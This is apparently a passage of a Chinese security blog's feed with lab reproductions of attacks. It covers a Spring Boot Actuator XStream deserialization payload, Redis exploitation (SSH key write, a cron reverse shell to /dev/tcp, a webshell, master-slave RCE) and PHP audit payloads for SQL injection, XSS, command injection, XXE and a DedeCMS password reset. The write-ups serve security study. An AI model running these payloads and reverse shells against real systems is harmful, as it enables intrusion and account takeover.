    &lt;value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"&gt;
      &lt;dataHandler&gt;
        &lt;dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"&gt;
          &lt;is class="javax.crypto.CipherInputStream"&gt;
            &lt;cipher class="javax.crypto.NullCipher"&gt;
              &lt;serviceIterator class="javax.imageio.spi.FilterIterator"&gt;
                &lt;iter class="javax.imageio.spi.FilterIterator"&gt;
                  &lt;iter class="java.util.Collections$EmptyIterator"/&gt;
                  &lt;next class="java.lang.ProcessBuilder"&gt;
                    &lt;command&gt;
                      &lt;string&gt;命令&lt;/string&gt;
                    &lt;/command&gt;
                    &lt;redirectErrorStream&gt;false&lt;/redirectErrorStream&gt;
                  &lt;/next&gt;
                &lt;/iter&gt;
                &lt;filter class="javax.imageio.ImageIO$ContainsFilter"&gt;
                  &lt;method&gt;
                    &lt;class&gt;java.lang.ProcessBuilder&lt;/class&gt;
                    &lt;name&gt;start&lt;/name&gt;
                    &lt;parameter-types/&gt;
                  &lt;/method&gt;
                  &lt;name&gt;foo&lt;/name&gt;
                &lt;/filter&gt;
                &lt;next&gt;foo&lt;/next&gt;
              &lt;/serviceIterator&gt;
              &lt;lock/&gt;
            &lt;/cipher&gt;
            &lt;input class="java.lang.ProcessBuilder$NullInputStream"/&gt;
            &lt;ibuffer&gt;&lt;/ibuffer&gt;
          &lt;/is&gt;
        &lt;/dataSource&gt;
      &lt;/dataHandler&gt;
    &lt;/value&gt;
  &lt;/jdk.nashorn.internal.objects.NativeString&gt;
&lt;/linked-hash-set&gt;"""
    return Response(xml, mimetype='application/xml')
</code></pre>
<ul>
<li>启动服务</li>
</ul>
<pre><code class="line-numbers">python3 flask_xstream.py
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522195600.png" alt="" /></p>
<ul>
<li>写入配置</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522195921.png" alt="" /></p>
<ul>
<li>刷新触发</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522195952.png" alt="" /></p>
<ul>
<li>获取反弹shell</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522195843.png" alt="" /></p>
<h2>参考</h2>
<p><a class="wp-editor-md-post-content-link" href="https://mp.weixin.qq.com/s/HmGEYRcf1hSVw9Uu9XHGsA">一次曲折的渗透测试之旅</a></p>
<p><a class="wp-editor-md-post-content-link" href="https://www.freebuf.com/column/234266.html">Spring Boot Actuator 漏洞利用</a></p>
<p><a class="wp-editor-md-post-content-link" href="https://jianfensec.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Spring%20Boot%20Actuators%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">Spring Boot Actuators配置不当导致RCE漏洞复现</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>漏洞复现系列之Redis</title>
		<link>/web/1784.html</link>
		
		<dc:creator><![CDATA[syst1m]]></dc:creator>
		<pubDate>Sun, 24 May 2020 12:50:43 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<guid isPermaLink="false">/?p=1784</guid>

					<description><![CDATA[环境搭建 在虚拟机中搭建redis服务 测试连接 写ssh-keygen公钥登陆 首先在本地生产公私钥文件 ssh-keygen –t rsa 公钥写入 key.txt 文件 (e...]]></description>
										<content:encoded><![CDATA[<ul>
<li>环境搭建</li>
</ul>
<p><em>在虚拟机中搭建redis服务</em><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200524175624.png" alt="" /></p>
<ul>
<li>测试连接</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200524180324.png" alt="" /></p>
<h2>写ssh-keygen公钥登陆</h2>
<ul>
<li>首先在本地生产公私钥文件</li>
</ul>
<pre><code class="line-numbers">ssh-keygen –t rsa
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200524194700.png" alt="" /></p>
<ul>
<li>公钥写入 key.txt 文件</li>
</ul>
<pre><code class="line-numbers">(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") &gt; test.txt
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200524195047.png" alt="" /></p>
<ul>
<li>连接 Redis 写入文件</li>
</ul>
<pre><code class="line-numbers">cat test.txt | redis-cli -h 192.168.1.103 -x set crackit
redis-cli -h 192.168.1.103
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
save
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200524200329.png" alt="" /></p>
<ul>
<li>私钥登陆</li>
</ul>
<pre><code class="line-numbers">ssh -i id_rsa root@192.168.1.103
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200524200456.png" alt="" /></p>
<h2>利用计划任务执行命令反弹shell</h2>
<ul>
<li>监听一个端口</li>
</ul>
<pre><code class="line-numbers">nc -lvvp 6666
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200524200813.png" alt="" /></p>
<ul>
<li>写入反弹shell</li>
</ul>
<pre><code class="line-numbers">set x "\n\n*/1 * * * * /bin/bash -i &gt;&amp; /dev/tcp/192.168.1.101/6666 0&gt;&amp;1\n\n"
config set dir /var/spool/cron/
config set dbfilename root
save
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200524201145.png" alt="" /></p>
<ul>
<li>反弹shell</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200524201238.png" alt="" /></p>
<h2>WEB目录写webshell</h2>
<ul>
<li>写shell</li>
</ul>
<pre><code class="line-numbers">config set dir /var/www/html/
config set dbfilename shell.php
set x "&lt;?php phpinfo();?&gt;"
save
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200524201441.png" alt="" /></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200524201742.png" alt="" /></p>
<h2>基于主从复制的RCE</h2>
<ul>
<li>影响范围</li>
</ul>
<pre><code class="line-numbers">Redis 4.x/5.x
</code></pre>
<ul>
<li>工具下载地址</li>
</ul>
<pre><code class="line-numbers">https://github.com/jas502n/Redis-RCE.git
</code></pre>
<ul>
<li>主从利用</li>
</ul>
<pre><code class="line-numbers">python redis-rce.py -r 192.168.1.103 -p 6379 -L 192.168.1.101 -f exp_lin.so
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200524204257.png" alt="" /></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>php代码审计学习之函数缺陷</title>
		<link>/web/1782.html</link>
		
		<dc:creator><![CDATA[syst1m]]></dc:creator>
		<pubDate>Fri, 22 May 2020 02:34:49 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[教程分享]]></category>
		<category><![CDATA[渗透测试]]></category>
		<guid isPermaLink="false">/?p=1782</guid>

					<description><![CDATA[感兴趣的可以参考一下PHP-Audit-Labs 首发地址：php代码审计学习之函数缺陷 in_array函数缺陷 Wish List Code class Challenge {...]]></description>
										<content:encoded><![CDATA[<p><strong>感兴趣的可以参考一下</strong><a class="wp-editor-md-post-content-link" href="https://github.com/hongriSec/PHP-Audit-Labs">PHP-Audit-Labs</a></p>
<p><strong>首发地址：</strong><a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/7765">php代码审计学习之函数缺陷</a></p>
<h2>in_array函数缺陷</h2>
<h3>Wish List</h3>
<ul>
<li>Code</li>
</ul>
<pre><code class="language-php line-numbers">class Challenge {
  const UPLOAD_DIRECTORY = './solutions/';
  private $file;
  private $whitelist;

  public function __construct($file) {
    $this-&gt;file = $file;
    $this-&gt;whitelist = range(1, 24);
  }

  public function __destruct() {
    if (in_array($this-&gt;file['name'], $this-&gt;whitelist)) {
      move_uploaded_file(
        $this-&gt;file['tmp_name'],
        self::UPLOAD_DIRECTORY . $this-&gt;file['name']
      );
    }
  }
}

$challenge = new Challenge($_FILES['solution']);
</code></pre>
<ul>
<li>代码理解</li>
</ul>
<p><strong>代码为一个文件上传的代码，如果文件名存在于1-24中，则上传文件</strong></p>
<ul>
<li>in_array函数</li>
</ul>
<pre><code class="line-numbers">in_array
检查数组中是否存在某个值
</code></pre>
<ul>
<li>题解</li>
</ul>
<p><strong>php弱类型比较时，6php会转换为6，6在1-24中间，所以可以进行上传</strong></p>
<h3>piwigo2.7.1实例分析</h3>
<ul>
<li>环境搭建</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200308143432.png" alt="" /></p>
<h4>漏洞分析</h4>
<ul>
<li>于picture.php:332中</li>
</ul>
<pre><code class="language-php line-numbers">case 'rate' :
    {
      include_once(PHPWG_ROOT_PATH.'include/functions_rate.inc.php');
      rate_picture($page['image_id'], $_POST['rate']);
      redirect($url_self);
    }
</code></pre>
<p><strong>当case为rate时，将变量rate和变量image_id传入functions_rate.inc.php文件中的rate_picture函数</strong></p>
<ul>
<li>include/functions_rate.inc.php:38</li>
</ul>
<pre><code class="language-php line-numbers">or !in_array($rate, $conf['rate_items']))
</code></pre>
<p><strong>查找变量rate是否存在于$conf[&#8216;rate_items&#8217;]当中</strong></p>
<pre><code class="language-php line-numbers">$conf['rate_items']
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200308145619.png" alt="" /></p>
<ul>
<li>直接将rate进行了拼接</li>
</ul>
<pre><code class="language-php line-numbers">$query = '
INSERT
  INTO '.RATE_TABLE.'
  (user_id,anonymous_id,element_id,rate,date)
  VALUES
  ('
    .$user['id'].','
    .'\''.$anonymous_id.'\','
    .$image_id.','
    .$rate
    .',NOW())
;';
  pwg_query($query);

  return update_rating_score($image_id);
}
$query = '
INSERT
  INTO '.RATE_TABLE.'
  (user_id,anonymous_id,element_id,rate,date)
  VALUES
  ('
    .$user['id'].','
    .'\''.$anonymous_id.'\','
    .$image_id.','
    .$rate
    .',NOW())
;';
  pwg_query($query);

  return update_rating_score($image_id);
}
</code></pre>
<p><strong>只要rate为array(0,1,2,3,4,5)便可以进行绕过，而in_array第三位未设置为true</strong></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="language-php line-numbers">1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));# 
</code></pre>
<ul>
<li>sqlmap</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200308174418.png" alt="" /></p>
<h3>CTF</h3>
<ul>
<li>环境搭建</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200308181630.png" alt="" /></p>
<ul>
<li>stop_hack函数</li>
</ul>
<pre><code class="language-php line-numbers">function stop_hack($value){
    $pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
    $back_list = explode("|",$pattern);
    foreach($back_list as $hack){
        if(preg_match("/$hack/i", $value))
            die("$hack detected!");
    }
    return $value;
}
</code></pre>
<p><strong>stop_hack用来过滤一些危险函数</strong></p>
<ul>
<li>注入</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200308182616.png" alt="" /></p>
<p><strong>获取get的ID，通过stop_hack进行过滤并拼接到sql语句中进行查询</strong></p>
<ul>
<li>报错注入payload</li>
</ul>
<pre><code class="language-php line-numbers">and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200308183821.png" alt="" /></p>
<ul>
<li>参考</li>
</ul>
<pre><code class="line-numbers">https://github.com/hongriSec/PHP-Audit-Labs/blob/master/PHP-Audit-Labs%E9%A2%98%E8%A7%A3/Day1-4/files/README.md
https://xz.aliyun.com/t/2160
</code></pre>
<h2>filter_var函数缺陷</h2>
<h3>Twig</h3>
<pre><code class="language-php line-numbers">// composer require "twig/twig"
require 'vendor/autoload.php';

class Template {
  private $twig;

  public function __construct() {
    $indexTemplate = '&lt;img ' .
      'src="https://loremflickr.com/320/240"&gt;' .
      '&lt;a href="{{link|escape}}"&gt;Next slide &amp;raquo;&lt;/a&gt;';

    // Default twig setup, simulate loading
    // index.html file from disk
    $loader = new Twig\Loader\ArrayLoader([
      'index.html' =&gt; $indexTemplate
    ]);
    $this-&gt;twig = new Twig\Environment($loader);
  }

  public function getNexSlideUrl() {
    $nextSlide = $_GET['nextSlide'];
    return filter_var($nextSlide, FILTER_VALIDATE_URL);
  }

  public function render() {
    echo $this-&gt;twig-&gt;render(
      'index.html',
      ['link' =&gt; $this-&gt;getNexSlideUrl()]
    );
  }
}

(new Template())-&gt;render();
</code></pre>
<p><strong>使用escape和filter_var进行过滤</strong></p>
<ul>
<li>escape</li>
</ul>
<p><strong>默认是使用了htmlspecialchars方法进行过滤，</strong></p>
<ul>
<li>filter_var</li>
</ul>
<pre><code class="language-php line-numbers">使用特定的过滤器过滤一个变量
mixed filter_var ( mixed $variable [, int $filter = FILTER_DEFAULT [, mixed $options ]] )
</code></pre>
<ul>
<li>htmlspecialchars转义</li>
</ul>
<pre><code class="line-numbers">&amp; (&amp; 符号)  ===============  &amp;amp;
" (双引号)  ===============  &amp;quot;
' (单引号)  ===============  &amp;apos;
&lt; (小于号)  ===============  &amp;lt;
&gt; (大于号)  ===============  &amp;gt;
</code></pre>
<p><strong>默认只过滤双引号，不过滤单引号，只有设置了：quotestyle 选项为ENT_QUOTES才会过滤单引号</strong></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="line-numbers">javascript://comment%250aalert(1)
</code></pre>
<h3>anchor-cms</h3>
<ul>
<li>环境搭建</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200309141247.png" alt="" /></p>
<h4>源码分析</h4>
<ul>
<li>themes/default/404.php:9</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200309150252.png" alt="" /></p>
<ul>
<li>anchor/functions/helpers.php:34 current_url()函数</li>
</ul>
<pre><code class="language-php line-numbers">function current_url() {
    return Uri::current();
}
</code></pre>
<ul>
<li>system/uri.php:84</li>
</ul>
<pre><code class="language-php line-numbers">public static function current() {
        if(is_null(static::$current)) static::$current = static::detect();
        return static::$current;
    }
</code></pre>
<ul>
<li>detect 方法</li>
</ul>
<pre><code class="language-php line-numbers">public static function detect() {
        // create a server object from global
        $server = new Server($_SERVER);

        $try = array('REQUEST_URI', 'PATH_INFO', 'ORIG_PATH_INFO');

        foreach($try as $method) {

            // make sure the server var exists and is not empty
            if($server-&gt;has($method) and $uri = $server-&gt;get($method)) {

                // apply a string filter and make sure we still have somthing left
                if($uri = filter_var($uri, FILTER_SANITIZE_URL)) {

                    // make sure the uri is not malformed and return the pathname
                    if($uri = parse_url($uri, PHP_URL_PATH)) {
                        return static::format($uri, $server);
                    }

                    // woah jackie, we found a bad'n
                    throw new ErrorException('Malformed URI');
                }
            }
        }

        throw new OverflowException('Uri was not detected. Make sure the REQUEST_URI is set.');
    }
</code></pre>
<p><strong>关键代码</strong></p>
<pre><code class="language-php line-numbers">if($uri = filter_var($uri, FILTER_SANITIZE_URL)) {

                    // make sure the uri is not malformed and return the pathname
                    if($uri = parse_url($uri, PHP_URL_PATH)) {
                        return static::format($uri, $server);
                    }

                    // woah jackie, we found a bad'n
                    throw new ErrorException('Malformed URI');
</code></pre>
<ul>
<li>system/uri.php:126</li>
</ul>
<pre><code class="language-php line-numbers">    public static function format($uri, $server) {
        // Remove all characters except letters,
        // digits and $-_.+!*'(),{}|\\^~[]`&lt;&gt;#%";/?:@&amp;=.
        $uri = filter_var(rawurldecode($uri), FILTER_SANITIZE_URL);

        // remove script path/name
        $uri = static::remove_script_name($uri, $server);

        // remove the relative uri
        $uri = static::remove_relative_uri($uri);

        // return argument if not empty or return a single slash
        return trim($uri, '/') ?: '/';
    }
</code></pre>
<p><strong>没有对xss进行过滤</strong></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="line-numbers">http://localhost:8888/test/index.php/%3Cscript%3Ealert(1)%3C/script%3E
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200309153333.png" alt="" /></p>
<h3>CTF</h3>
<ul>
<li>环境搭建</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200309155130.png" alt="" /></p>
<ul>
<li>flag.php</li>
</ul>
<pre><code class="language-php line-numbers">&lt;?php  
$flag = "HRCTF{f1lt3r_var_1s_s0_c00l}"
?&gt;
</code></pre>
<ul>
<li>index.php</li>
</ul>
<pre><code class="language-php line-numbers">&lt;?php 
$url = $_GET['url']; // 获取url

if(isset($url) &amp;&amp; filter_var($url, FILTER_VALIDATE_URL)){  //过滤url
    $site_info = parse_url($url);

    if(preg_match('/sec-redclub.com$/',$site_info['host'])){ //以sec-redclub.com结尾
        exec('curl "'.$site_info['host'].'"', $result);
        echo "&lt;center&gt;&lt;h1&gt;You have curl {$site_info['host']} successfully!&lt;/h1&gt;&lt;/center&gt;
              &lt;center&gt;&lt;textarea rows='20' cols='90'&gt;";
        echo implode(' ', $result);
    } //命令执行

    else{
        die("&lt;center&gt;&lt;h1&gt;Error: Host not allowed&lt;/h1&gt;&lt;/center&gt;");
    }

}
else{
    echo "&lt;center&gt;&lt;h1&gt;Just curl sec-redclub.com!&lt;/h1&gt;&lt;/center&gt;&lt;br&gt;
          &lt;center&gt;&lt;h3&gt;For example:?url=http://sec-redclub.com&lt;/h3&gt;&lt;/center&gt;";
}
?&gt;
</code></pre>
<ul>
<li>payload</li>
</ul>
<pre><code class="line-numbers">syst1m://"|ls;"sec-redclub.com
syst1m://"|cat&lt;f1agi3hEre.php;"sec-redclub.com
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200309162636.png" alt="" /></p>
<h2>实例化任意对象漏洞</h2>
<h3>Snow Flake</h3>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">function __autoload($className) { //自动加载
  include $className;
}

$controllerName = $_GET['c'];
$data = $_GET['d'];  //获取get的c与d作为类名与参数

if (class_exists($controllerName)) {
  $controller = new $controllerName($data['t'], $data['v']);
  $controller-&gt;render();
} else {
  echo 'There is no page with this name';
}

class HomeController {
  private $template;
  private $variables;

  public function __construct($template, $variables) {
    $this-&gt;template = $template;
    $this-&gt;variables = $variables;
  }

  public function render() {
    if ($this-&gt;variables['new']) {
      echo 'controller rendering new response';
    } else {
      echo 'controller rendering old response';
    }
  }
}
</code></pre>
<p><strong>如果存在如果程序存在 __autoload函数，class_exists函数就会自动调用方法</strong></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="line-numbers">/?c=../../../../etc/passwd
</code></pre>
<h3>Shopware 5.3.3 （XXE）</h3>
<ul>
<li>环境搭建</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200310141611.png" alt="" /></p>
<h4>代码分析</h4>
<ul>
<li>漏洞触发点</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200310142234.png" alt="" /></p>
<ul>
<li>打断点</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200310143309.png" alt="" /></p>
<ul>
<li>engine/Shopware/Controllers/Backend/ProductStream.php:52</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200310143748.png" alt="" /></p>
<ul>
<li>engine/Shopware/Controllers/Backend/ProductStream.php:63</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200310144659.png" alt="" /></p>
<p><strong>使用$this->Request()->getParam(&#8216;sort&#8217;)获取sort，然后进入RepositoryInterface类的unserialize方法</strong></p>
<ul>
<li>engine/Shopware/Components/LogawareReflectionHelper.php:56</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200310145112.png" alt="" /></p>
<p><strong>调用的是LogawareReflectionHelper类的unserialize方法</strong></p>
<p><strong>$serialized为传入的sort变量，遍历取出className，传入createInstanceFromNamedArguments方法</strong></p>
<ul>
<li>engine/Shopware/Components/ReflectionHelper.php:40</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200310145747.png" alt="" /></p>
<p><strong>新建一个反射类，并传入参数，类名与参数都为sort中的，而sort可控</strong></p>
<ul>
<li>发送到burp</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200310153139.png" alt="" /></p>
<ul>
<li>修改payload</li>
</ul>
<pre><code class="line-numbers">/test/backend/ProductStream/loadPreview?_dc=1583825465339&amp;sort={"data":"http://localhost/xxe.xml","options":2,"data_is_url":1,"ns":"","is_prefix":0}}&amp;conditions={}&amp;shopId=1&amp;currencyId=1&amp;customerGroupKey=EK&amp;page=1&amp;start=0&amp;limit=25
</code></pre>
<ul>
<li>测试</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200310160323.png" alt="" /></p>
<ul>
<li>参考</li>
</ul>
<pre><code class="line-numbers">https://www.php.net/manual/zh/simplexmlelement.construct.php
</code></pre>
<h3>CTF</h3>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">&lt;?php

class NotFound{
    function __construct()
    {
        die('404');
    }
}
spl_autoload_register(
    function ($class){
        new NotFound();
    }
);

$classname = isset($_GET['name']) ? $_GET['name'] : null;
$param = isset($_GET['param']) ? $_GET['param'] : null;
$param2 = isset($_GET['param2']) ? $_GET['param2'] : null;
if(class_exists($classname)){
    $newclass = new $classname($param,$param2);
    var_dump($newclass);
    foreach ($newclass as $key=&gt;$value)
        echo $key.'=&gt;'.$value.'&lt;br&gt;';
}
</code></pre>
<p><strong>当class_exists时，调用__autoload方法，但是__autoload方法不存在，新建了一个spl_autoload_register方法，类似__autoload方法</strong></p>
<ul>
<li>列出文件（GlobIterator类）</li>
</ul>
<pre><code class="language-php line-numbers">public GlobIterator::__construct ( string $pattern [, int $flags = FilesystemIterator::KEY_AS_PATHNAME | FilesystemIterator::CURRENT_AS_FILEINFO ] )
</code></pre>
<p><strong>第一个参数为要搜索的文件名，第二个参数为第二个参数为选择文件的哪个信息作为键名</strong></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="line-numbers">http://127.0.0.1:8888/index.php?name=GlobIterator&amp;param=./*.php&amp;param2=0
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200310165128.png" alt="" /></p>
<ul>
<li>读取flag</li>
</ul>
<pre><code class="line-numbers">http://127.0.0.1:8888/index.php?name=SimpleXMLElement&amp;param=%3C?xml%20version=%221.0%22?%3E%3C!DOCTYPE%20ANY%20[%3C!ENTITY%20xxe%20SYSTEM%20%22php://filter/read=convert.base64-encode/resource=f1agi3hEre.php%22%3E]%3E%3Cx%3E%26xxe;%3C/x%3E&amp;param2=2
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200310165415.png" alt="" /><br />
&#8211; 参考</p>
<pre><code class="line-numbers">https://www.php.net/manual/en/function.spl-autoload-register.php
</code></pre>
<h2>strpos使用不当引发漏洞</h2>
<h3>False Beard</h3>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">class Login {
  public function __construct($user, $pass) {
    $this-&gt;loginViaXml($user, $pass);
  }

  public function loginViaXml($user, $pass) {
    if (
      (!strpos($user, '&lt;') || !strpos($user, '&gt;')) &amp;&amp;
      (!strpos($pass, '&lt;') || !strpos($pass, '&gt;'))
    ) {
      $format = '&lt;?xml version="1.0"?&gt;' .
        '&lt;user v="%s"/&gt;&lt;pass v="%s"/&gt;';
      $xml = sprintf($format, $user, $pass);
      $xmlElement = new SimpleXMLElement($xml);
      // Perform the actual login.
      $this-&gt;login($xmlElement);
    }
  }
}

new Login($_POST['username'], $_POST['password']);
</code></pre>
<ul>
<li>strpos</li>
</ul>
<pre><code class="line-numbers">主要是用来查找字符在字符串中首次出现的位置。
</code></pre>
<p><strong>查找代码中是否含有&lt;与>的特殊符号，strpos在没找到指定字符时会返回flase，如果第一个字符找到就返回0，0的取反为1，就可以注入xml进行注入了</strong></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="language-php line-numbers">user=&lt;"&gt;&lt;injected-tag property="&amp;pass=&lt;injected-tag&gt;
</code></pre>
<h3>DeDecms V5.7SP2任意密码重置漏洞</h3>
<ul>
<li>环境搭建</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200311133852.png" alt="" /></p>
<ul>
<li>开启会员登陆并且注册两个会员</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200311140110.png" alt="" /></p>
<ul>
<li>member/resetpassword.php:75 漏洞触发点</li>
</ul>
<pre><code class="language-php line-numbers">else if($dopost == "safequestion")
{
    $mid = preg_replace("#[^0-9]#", "", $id);
    $sql = "SELECT safequestion,safeanswer,userid,email FROM #@__member WHERE mid = '$mid'";
    $row = $db-&gt;GetOne($sql);
    if(empty($safequestion)) $safequestion = '';

    if(empty($safeanswer)) $safeanswer = '';

    if($row['safequestion'] == $safequestion &amp;&amp; $row['safeanswer'] == $safeanswer)
    {
        sn($mid, $row['userid'], $row['email'], 'N');
        exit();
    }
    else
    {
        ShowMsg("对不起，您的安全问题或答案回答错误","-1");
        exit();
    }

}
</code></pre>
<p><strong>将传入的mid进行查询，查询用户查询对应用户的安全问题、安全答案、用户id、电子邮件等信息，然后当安全问题和答案不为空且等于之前的设置的问题和答案的时候，进入sn函数</strong></p>
<ul>
<li>查看数据表</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200312132918.png" alt="" /></p>
<p><strong>当没设置问题答案时，safequestion为0，safeanswer为null，语句变为了</strong></p>
<pre><code class="language-php line-numbers">if($row['safequestion'] == $safequestion &amp;&amp; $row['safeanswer'] == $safeanswer)

$row['safequestion'] == 0 
$row['safeanswer'] == null

if ('0' == ''&amp; null == ''){
    sn()
}

 if(false &amp;&amp; true)
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200312134303.png" alt="" /></p>
<ul>
<li>member/inc/inc_pwd_functions.php:150</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200312135317.png" alt="" /></p>
<ul>
<li>member/inc/inc_pwd_functions.php:73</li>
</ul>
<p><strong>进入newmail函数</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200312140852.png" alt="" /></p>
<p><strong>如果$send == &#8216;N&#8217;则发送重置邮件</strong></p>
<pre><code class="language-php line-numbers">sendmail($mailto,$mailtitle,$mailbody,$headers);
</code></pre>
<pre><code class="language-php line-numbers">/resetpassword.php?dopost=getpasswd&amp;id=".$mid."&amp;key=".$randval
</code></pre>
<ul>
<li>member/resetpassword.php:96</li>
</ul>
<p><strong>如果$id为空则退出，如果row不为空，则执行</strong></p>
<pre><code class="language-php line-numbers">    if(empty($setp))
    {
        $tptim= (60*60*24*3);
        $dtime = time();
        if($dtime - $tptim &gt; $row['mailtime'])
        {
            $db-&gt;executenonequery("DELETE FROM `#@__pwd_tmp` WHERE `md` = '$id';");
            ShowMsg("对不起，临时密码修改期限已过期","login.php");
            exit();
        }
        require_once(dirname(__FILE__)."/templets/resetpassword2.htm");
    }
</code></pre>
<ul>
<li>member/templets/resetpassword2.htm:95</li>
</ul>
<pre><code class="language-php line-numbers">&lt;input type="hidden" name="dopost" value="getpasswd"&gt;
&lt;input type="hidden" name="setp" value="2"&gt;
&lt;input type="hidden" name="id" value="&lt;?php echo $id;?&gt;" /&gt;
</code></pre>
<p><strong>将setp的属性设置为2</strong></p>
<ul>
<li>member/resetpassword.php:123</li>
</ul>
<pre><code class="language-php line-numbers">elseif($setp == 2) 
    {
        if(isset($key)) $pwdtmp = $key;

        $sn = md5(trim($pwdtmp));
        if($row['pwd'] == $sn)
        {
            if($pwd != "")
            {
                if($pwd == $pwdok)
                {
                    $pwdok = md5($pwdok);
                    $sql = "DELETE FROM `#@__pwd_tmp` WHERE `mid` = '$id';";
                    $db-&gt;executenonequery($sql);
                    $sql = "UPDATE `#@__member` SET `pwd` = '$pwdok' WHERE `mid` = '$id';";
                    if($db-&gt;executenonequery($sql))
                    {
                        showmsg('更改密码成功，请牢记新密码', 'login.php');
                        exit;
                    }
                }
            }
            showmsg('对不起，新密码为空或填写不一致', '-1');
            exit;
        }
        showmsg('对不起，临时密码错误', '-1');
        exit;
    }
</code></pre>
<p><strong>如果key等于$row[&#8216;pwd&#8217;]，则重置密码成功</strong></p>
<h4>漏洞验证</h4>
<ul>
<li>访问重置密码链接获取key</li>
</ul>
<pre><code class="line-numbers">member/resetpassword.php?dopost=safequestion&amp;safequestion=0.0&amp;safeanswer=&amp;id=3
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200312150736.png" alt="" /></p>
<ul>
<li>重置密码</li>
</ul>
<pre><code class="line-numbers">member/resetpassword.php?dopost=getpasswd&amp;id=3&amp;key=VeRkLvEU
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200312150922.png" alt="" /></p>
